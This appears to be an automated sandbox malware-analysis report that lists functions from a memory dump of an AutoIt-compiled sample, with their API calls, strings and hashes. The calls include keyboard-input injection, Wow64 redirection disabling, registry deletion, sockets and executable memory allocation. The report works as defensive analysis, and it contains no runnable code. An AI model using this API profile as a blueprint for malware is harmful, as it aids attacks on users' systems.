Opcode ID: d12f3413d06f3a0062c3520f34050e70997ce083f9712d39c739de09c93907ea
Instruction ID: d65c3c45dc3a52b85e6666cb6a99aaef183be22aaf0fc8c01331076e23d8dfd6
Opcode Fuzzy Hash: d12f3413d06f3a0062c3520f34050e70997ce083f9712d39c739de09c93907ea
Instruction Fuzzy Hash: 0ED01775950713CFD720AF31D818B4A76E4FF06395B11C8BED8C6D6150E7B0D880CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4D2E,?,00BC4F4F,?,00C862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BC4D81

Strings

kernel32.dll, xrefs: 00BC4D6A
Wow64DisableWow64FsRedirection, xrefs: 00BC4D7B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 1f72fe179c4f28ad1b41f2ce63886e215e1841d5162860feef6a50438702474f
Instruction ID: 66131d6b3da5c8c0ff7213ca63cece7678e314a6cea890a267239fc45b2efce7
Opcode Fuzzy Hash: 1f72fe179c4f28ad1b41f2ce63886e215e1841d5162860feef6a50438702474f
Instruction Fuzzy Hash: CCD01775910713CFD720AF35D818B1A76E8FF16392B11C9BE9887D6250E770D880CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C41072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00C412C1), ref: 00C41080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C41092

Strings

advapi32.dll, xrefs: 00C4107B
RegDeleteKeyExW, xrefs: 00C4108C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 8d90b7cec70718dae60d60339668ff9f8b1c628efbd2a2f8bc5e55cae9071f21
Instruction ID: a157ea8b80b21b0695ea64b7415abed4ee2a70cff1fbafb8fa4f07ee5d9bc84e
Opcode Fuzzy Hash: 8d90b7cec70718dae60d60339668ff9f8b1c628efbd2a2f8bc5e55cae9071f21
Instruction Fuzzy Hash: B7D0E275920712CFD7209B35D818B5A76E4BF06361B15C83EA8DADA150EB70C8C0CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00C393F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C39009,?,00C4F910), ref: 00C39403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C39415

Strings

kernel32.dll, xrefs: 00C393FE
GetModuleHandleExW, xrefs: 00C3940F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: cdedc9d28178ca95051f0379aebbf057d3044ba8372d9aef2d396b6d0c760aca
Instruction ID: 81498155e283fcc93cb785dd86b2c37c2555f89e80057a39972d6a68ad354e97
Opcode Fuzzy Hash: cdedc9d28178ca95051f0379aebbf057d3044ba8372d9aef2d396b6d0c760aca
Instruction Fuzzy Hash: 65D01779920713DFD7209F31DA0870B76E5FF06392F11C83EA896D6550E6B0C881DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00C176C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7531bbf66e198e11d5d439dd9f3d700f1adc1bce56df4a6139075bdcb0aac0c1
Instruction ID: 85da715d3efa92afb38f52643f4111254d7ceef94cc2f178a725b75d7579ecf0
Opcode Fuzzy Hash: 7531bbf66e198e11d5d439dd9f3d700f1adc1bce56df4a6139075bdcb0aac0c1
Instruction Fuzzy Hash: 1AC18F74A04216EFDB14CF94C888EAEB7F5FF49710B158698E815EB251D730EE81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C3E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C3E3D2
CharLowerBuffW.USER32(?,?), ref: 00C3E415

Part of subcall function 00C3DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C3DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C3E615
_memmove.LIBCMT ref: 00C3E628

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 05787e9d91d469d5c738b67009cb32e80e03d23bf0e2696ea0483ff63a4d859c
Instruction ID: 8ea917acb205ece29772ff83581f512240a0c979b8efe842cd35dbc72d22db45
Opcode Fuzzy Hash: 05787e9d91d469d5c738b67009cb32e80e03d23bf0e2696ea0483ff63a4d859c
Instruction Fuzzy Hash: 82C168716183018FC714DF29C480A6ABBE4FF88714F14896EF8999B391D771EA46CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00C383A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C383D8
CoUninitialize.OLE32 ref: 00C383E3

Part of subcall function 00C1DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1DAC5

VariantInit.OLEAUT32(?), ref: 00C383EE
VariantClear.OLEAUT32(?), ref: 00C386BF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 75f5696e959deabcc55527386d34c37f0cb1df71a3607123d53db9e8dcc3cb8b
Instruction ID: 7e804c9e6d4273d31c868d78d044ead6761d7a4934ec5ed88b8b7705fa0f9867
Opcode Fuzzy Hash: 75f5696e959deabcc55527386d34c37f0cb1df71a3607123d53db9e8dcc3cb8b
Instruction Fuzzy Hash: 66A135752147019FEB10DF15C885B2AB7E4BF88714F15449CF9AA9B3A2CB70ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C17A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C17C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C17C4A
CLSIDFromProgID.OLE32(?,?,00000000,00C4FB80,000000FF,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C17C6F
_memcmp.LIBCMT ref: 00C17C90

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: f8deb3f559883101e3875dc82f41841f51d0c0f93c5b437b579e700adf6e6ea9
Instruction ID: f64bad686badd903794e00bca21d96a606add3383b4bd980f4a9496c00e59bb9
Opcode Fuzzy Hash: f8deb3f559883101e3875dc82f41841f51d0c0f93c5b437b579e700adf6e6ea9
Instruction Fuzzy Hash: 60814D75A04109EFCB00DF94C988EEEB7B9FF8A315F204198F515AB250DB71AE46DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C16DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C16E04
SysAllocString.OLEAUT32(00000000), ref: 00C16EAD
VariantCopy.OLEAUT32 ref: 00C16EDC
VariantClear.OLEAUT32(?), ref: 00C16F03

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 580acbc2a7a8971165b4629e0022051329eedcdc663031e15851a52453b0f710
Instruction ID: 8ae6d632e7a57c7ba4ef5d3732e9b9adb9b931cdc13da87e144cdc48c57a6f3d
Opcode Fuzzy Hash: 580acbc2a7a8971165b4629e0022051329eedcdc663031e15851a52453b0f710
Instruction Fuzzy Hash: 2351A6346043029ADB24AF66D895BAEB3F5AF4B310F20991FE556CB291DF70D8C1BB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C36CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C36CE4
WSAGetLastError.WSOCK32(00000000), ref: 00C36CF4

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C36D58
WSAGetLastError.WSOCK32(00000000), ref: 00C36D64

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 6a66f42ef1b535fe1fdb3c74894cf935c682a20e96bfac9a354b98ecd21a5901
Instruction ID: e056c490bf8f668c90e1c3f17b00f86ae3e921f51d86c799a2f6002e96aa09ed
Opcode Fuzzy Hash: 6a66f42ef1b535fe1fdb3c74894cf935c682a20e96bfac9a354b98ecd21a5901
Instruction Fuzzy Hash: 11419174740200AFEB20AF24DC8AF7A77E5AF05B10F44809CFA599B2D2DAB19D018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C3672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C4F910), ref: 00C367BA
_strlen.LIBCMT ref: 00C367EC

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: c550563125b2af9753ca8226190cea9db899787ec8b73e033d4165c83c717736
Instruction ID: 2461001b017c73e33218431a3e026bb92f44504acd457a3e442dd080418d76a4
Opcode Fuzzy Hash: c550563125b2af9753ca8226190cea9db899787ec8b73e033d4165c83c717736
Instruction Fuzzy Hash: 6D41A235A00104AFCB14EB65DCC5FAEB3E9EF49310F1481A9F9269B2D2DB70AE40D751

Uniqueness

Uniqueness Score: -1.00%

Function 00C2BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C2BB09
GetLastError.KERNEL32(?,00000000), ref: 00C2BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C2BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C2BB80

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 05244834bf036f36d43c6c2e9de79d5fbb2359c40e58bf411e91a5936c793383
Instruction ID: 19a5448d1f1799b73ee212bb9cfbcd80655b93db0f368dd757b353bca419ae3f
Opcode Fuzzy Hash: 05244834bf036f36d43c6c2e9de79d5fbb2359c40e58bf411e91a5936c793383
Instruction Fuzzy Hash: EB412839200A20DFDB20EF15D588E5DBBE1EF49710B098498F85A9B762CB74FD01DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C4ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00C4AE1A
GetWindowRect.USER32(?,?), ref: 00C4AE90
PtInRect.USER32(?,?,00C4C304), ref: 00C4AEA0
MessageBeep.USER32(00000000), ref: 00C4AF11

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: a74fa662ee3bb34b03af734e94d21e67b30d296389c568e7eb167cde14d1fc47
Instruction ID: 06859f339d4ea1c3d21ed848f234f1095163b91be1b6bc35c8051314d20fab68
Opcode Fuzzy Hash: a74fa662ee3bb34b03af734e94d21e67b30d296389c568e7eb167cde14d1fc47
Instruction Fuzzy Hash: 65419C74640219DFDB11CF59C884BADBBF5FF49350F1881A9E828CB291D730A952DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00C20FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C21037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C21053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C210B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C2110B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 69262673725f796d056105a3b42dfd04a7fd5dbe669de7e43789d3e6400f33fd
Instruction ID: 03970c684002e3501a0fa86544e8328d579b6e6ab53f83b60c93c05cd471952c
Opcode Fuzzy Hash: 69262673725f796d056105a3b42dfd04a7fd5dbe669de7e43789d3e6400f33fd
Instruction Fuzzy Hash: 8C315E30E406B8AEFF308B66AC057FDBBA5AB65310F1C421AFDA0529D1C3748ED19751

Uniqueness

Uniqueness Score: -1.00%

Function 00C21121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00C21176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C21192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C211F1
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00C21243

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 53a5628e611ff881a5f818558e6eec3d71d398ebb1a4917cdd1d228dfdd1ca46
Instruction ID: 6a67a0384a74ce39e7b77a0a70fe2b206d4029847e83d324b0e187b46b2adc22
Opcode Fuzzy Hash: 53a5628e611ff881a5f818558e6eec3d71d398ebb1a4917cdd1d228dfdd1ca46
Instruction Fuzzy Hash: D0312B309407289EFF208A65EC057FE7BA9AB69310F1C431FF9A0929D1C3748B659751

Uniqueness

Uniqueness Score: -1.00%

Function 00BF6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BF644B
__isleadbyte_l.LIBCMT ref: 00BF6479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF64A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF64DD

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e62e418a7a27c03afc62059a3b93165cc9fa58e6d4a061559c5355b56f6a84ee
Instruction ID: 4cafdf38ee125dbc605458136cf192ccfaab5bea19ba105d324c8ea3b769f1e6
Opcode Fuzzy Hash: e62e418a7a27c03afc62059a3b93165cc9fa58e6d4a061559c5355b56f6a84ee
Instruction Fuzzy Hash: 7631BE3160024AAFDB21AF65C885BBA7BF5FF41310F1540A9EE64872A1EB31D859DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C45175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C45189

Part of subcall function 00C2387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C23897
Part of subcall function 00C2387D: GetCurrentThreadId.KERNEL32 ref: 00C2389E
Part of subcall function 00C2387D: AttachThreadInput.USER32(00000000,?,00C252A7), ref: 00C238A5

GetCaretPos.USER32(?), ref: 00C4519A
ClientToScreen.USER32(00000000,?), ref: 00C451D5
GetForegroundWindow.USER32 ref: 00C451DB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 070cc73df9aa9011f434b8557ff6489813bf9985c35967b451adc63898fbed6f
Instruction ID: 88b63620d2229acf42f21a52eb21478328074f08d8c8a0bf422f6ff4300345a3
Opcode Fuzzy Hash: 070cc73df9aa9011f434b8557ff6489813bf9985c35967b451adc63898fbed6f
Instruction Fuzzy Hash: 04311E75900108AFDB10EFA5D885EEFB7F9EF98300F1040AAF415E7241EA759E45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

GetCursorPos.USER32(?), ref: 00C4C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BFBBFB,?,?,?,?,?), ref: 00C4C7D7
GetCursorPos.USER32(?), ref: 00C4C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BFBBFB,?,?,?), ref: 00C4C85E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
